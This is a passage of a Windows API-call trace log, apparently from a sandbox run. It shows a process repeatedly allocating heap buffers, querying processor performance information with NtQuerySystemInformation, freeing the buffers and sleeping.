hHeap=0x2560000) returned 1 [0242.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0242.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0242.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0242.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0242.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.348] Sleep (dwMilliseconds=0x110) [0242.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0242.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0242.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0242.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0242.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0242.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0242.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0242.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0242.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.366] Sleep (dwMilliseconds=0x110) [0242.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0242.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0242.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0242.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0242.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0242.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0242.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.383] Sleep (dwMilliseconds=0x110) [0242.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0242.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0242.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0242.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0242.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0242.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0242.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0242.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0242.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.391] Sleep (dwMilliseconds=0x110) [0242.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0242.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0242.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0242.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0242.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0242.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0242.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0242.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0242.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.410] Sleep (dwMilliseconds=0x110) [0242.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0242.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0242.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0242.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0242.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0242.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0242.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0242.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.438] Sleep (dwMilliseconds=0x110) [0242.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0242.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0242.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0242.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0242.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0242.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0242.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.505] Sleep (dwMilliseconds=0x110) [0242.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0242.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0242.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0242.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0242.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0242.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0242.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0242.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0242.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.567] Sleep (dwMilliseconds=0x110) [0242.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0242.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0242.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0242.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0242.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0242.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0242.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.630] Sleep (dwMilliseconds=0x110) [0242.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0242.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0242.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0242.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.680] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0242.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.685] Sleep (dwMilliseconds=0x110) [0242.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0242.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0242.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0242.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0242.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0242.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0242.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0242.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.725] Sleep (dwMilliseconds=0x110) [0242.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0242.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0242.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0242.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0242.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0242.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0242.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0242.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.737] Sleep (dwMilliseconds=0x110) [0242.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0242.756] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0242.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0242.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0242.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0242.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0242.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0242.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.759] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0242.759] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.760] Sleep (dwMilliseconds=0x110) [0242.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0242.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0242.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0242.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0242.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0242.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0242.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0242.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0242.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.786] Sleep (dwMilliseconds=0x110) [0242.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0242.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: 